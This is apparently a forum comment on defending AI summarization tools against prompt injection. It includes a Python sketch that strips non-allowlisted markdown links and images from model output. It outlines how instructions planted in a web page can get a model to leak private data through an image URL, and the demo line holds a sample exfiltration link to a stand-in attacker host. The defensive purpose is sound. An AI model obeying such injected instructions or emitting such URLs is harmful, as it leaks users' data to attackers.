by in_a_society
920 days ago
Without removing the functionality as it currently exists, I don't see a way to prevent this attack. It seems the only real way is to have the user not specify websites to scrape for info, but instead copy and paste that content themselves, where they at least stand a greater-than-zero chance of noticing a crafted prompt.
There's currently no reliable solution to the threat of malicious instructions sneaking in via web page summarization and the like, so the key thing is to limit the damage those instructions can do. That means not exposing harmful actions for the language model to carry out, and cutting off exfiltration vectors.
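
As a rough illustration of cutting off one exfiltration vector, here is a minimal Python sketch. It assumes the model's output is rendered as markdown in a chat UI, where an injected instruction could make the model emit an image or link whose URL carries private data to an attacker's server. The names `ALLOWED_HOSTS`, `is_allowed` and `neutralize_links` are hypothetical, and the allowlist contents are a placeholder. It only handles markdown-style links and images, so raw URLs, HTML and other channels would need their own handling.

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist: hosts the UI is permitted to load from or link to.
ALLOWED_HOSTS = {"example.com"}

# Matches markdown images ![alt](url) and links [text](url).
MD_LINK = re.compile(r"(!?)\[([^\]]*)\]\(\s*([^)\s]+)[^)]*\)")


def is_allowed(url: str) -> bool:
    """Allow only https URLs whose host is on the allowlist."""
    try:
        parsed = urlparse(url)
    except ValueError:
        # Malformed URLs are treated as untrusted.
        return False
    return parsed.scheme == "https" and parsed.hostname in ALLOWED_HOSTS


def neutralize_links(model_output: str) -> str:
    """Strip the URL from any markdown link or image that is not allowlisted."""

    def replace(match: re.Match) -> str:
        bang, text, url = match.groups()
        if is_allowed(url):
            return match.group(0)
        # Drop the URL so nothing is fetched or clickable; keep visible text.
        return f"[image removed: {text}]" if bang else text

    return MD_LINK.sub(replace, model_output)


if __name__ == "__main__":
    print(neutralize_links("Summary. ![x](https://evil.test/log?q=secret)"))
```

A filter like this does nothing to stop the injection itself; it only reduces what an injected instruction can accomplish once it has run, which is the damage-limiting approach described above.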